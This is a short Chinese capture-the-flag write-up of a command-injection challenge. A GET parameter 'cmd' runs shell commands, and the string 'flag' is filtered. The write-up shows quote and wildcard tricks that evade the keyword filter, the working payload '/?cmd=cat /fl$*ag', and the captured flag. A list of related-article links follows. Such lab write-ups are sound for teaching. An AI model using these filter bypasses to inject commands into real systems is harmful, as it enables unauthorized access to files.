开启靶场,打开链接:
GET传参cmd,且对flag字符串进行了过滤
用\*绕过,fl*ag
用'绕过,f''lag或f'l'ag
当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)
/?cmd=cat /fl$*ag
成功得到flag:
NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}
相关推荐
两个人的幸福10 天前
Windows 桌面应用自研 PHP 队列(下):完整代码与六大工程化优化BingoGo12 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝JaguarJack12 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝用户30745969820713 天前
PHP 扩展——从入门到理解鹏仔先生13 天前
拷贝漫画APP下载页PHP程序,后台带免费AI写作云水一下14 天前
从零开始学 PHP 系列(一):PHP 的前世今生与开发环境搭建treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力xingpanvip14 天前
星盘接口开发文档:本命盘接口指南零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领上海云盾第一敬业销售14 天前
深入解析WAF的工作原理与机制